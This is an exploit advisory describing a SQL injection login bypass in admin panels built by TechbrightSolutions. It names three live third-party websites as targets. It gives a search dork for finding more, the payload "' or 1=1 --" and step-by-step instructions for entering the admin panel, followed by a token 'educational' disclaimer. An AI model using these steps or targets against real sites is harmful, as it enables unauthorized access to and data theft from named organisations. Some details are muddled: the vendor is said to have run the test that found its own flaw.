TITLE: Techbrightsolutions - Sql Injection/Admin Panel Bypass
# Exploit Author: Onur Kara (root9ext)
# Service Provider: TechbrightSolutions
# Vulnerable URL: /Admin/login.aspx
# Dork: "by TechbrightSolutions" "login"
# Vulnerability Type: SQL Bypass
# Severity: Critical
Vulnerability Description:
During a recent penetration test conducted by TechbrightSolutions, a critical SQL injection vulnerability was discovered in the Admin Panel login functionality of TechbrightSolutions' application's code. The vulnerability allows an attacker to bypass authentication controls and execute arbitrary SQL queries, potentially leading to unauthorized access and data compromise.
Proof of Concept (PoC):
URLs:
- http://kolencheryfamilytrust.org/Admin/login.aspx
- http://vivacards.in/Admin/AdminLogin.aspx
- https://globaljobs24.com/AdminLogin.aspx
1. Visit the admin login page, typically located at: http://kolencheryfamilytrust.org/Admin/login.aspx
2. Input the following payload in the username and password fields:
' or 1=1 --
' or 1=1 --
3. Submit the form.
4. Observe that the admin panel is accessible without redirection, indicating successful authentication bypass.
# Disclaimer: This PoC is for educational purposes only. Unauthorized access to systems or applications is illegal.
Contact
Telegram: @rootninext